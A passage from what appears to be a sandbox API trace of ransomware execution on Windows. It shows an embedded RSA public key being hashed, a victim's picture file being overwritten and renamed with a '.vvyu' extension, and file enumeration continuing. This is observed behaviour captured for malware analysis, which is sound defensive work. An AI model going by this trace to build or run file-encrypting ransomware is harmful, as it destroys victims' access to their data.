KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.018] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.018] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.018] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0200.019] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.019] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.019] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.019] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.019] GetLastError () returned 0x0 [0200.019] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0200.019] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0200.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.020] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.020] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.020] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x29a0) returned 0x2ea99b0 [0200.020] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f7c8 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f810 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0200.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.022] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0200.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0200.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0200.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32a8 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3290 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0200.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0200.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0200.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0200.025] GetCurrentThreadId () returned 0x66c [0200.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7c98 [0200.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0200.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0200.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.026] GetCurrentThreadId () returned 0x66c [0200.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0200.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0200.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32a8 [0200.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0200.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3308 [0200.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0200.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0200.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0200.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3320 [0200.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32c0 [0200.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0200.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0200.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3290 [0200.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0200.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0200.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0200.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0200.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0200.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0200.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0200.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0200.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0200.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f810 | out: hHeap=0x620000) returned 1 [0200.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0200.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.038] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x2993, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x2993, lpOverlapped=0x0) returned 1 [0200.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.038] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x2998, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.038] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0200.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0200.040] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.040] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.041] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.041] CloseHandle (hObject=0x510) returned 1 [0200.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0200.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0200.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0200.043] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\YdXrJd.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\ydxrjd.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\YdXrJd.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\ydxrjd.png.vvyu")) returned 1 [0200.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.044] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0200.047] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713be870, ftCreationTime.dwHighDateTime=0x1d897a1, ftLastAccessTime.dwLowDateTime=0x7c52a6f0, ftLastAccessTime.dwHighDateTime=0x1d89840, ftLastWriteTime.dwLowDateTime=0x7c52a6f0, ftLastWriteTime.dwHighDateTime=0x1d89840, nFileSizeHigh=0x0, nFileSizeLow=0x2998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YdXrJd.png", cAlternateFileName="")) returned 0 [0200.047] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0200.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0200.048] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0200.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0200.048] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 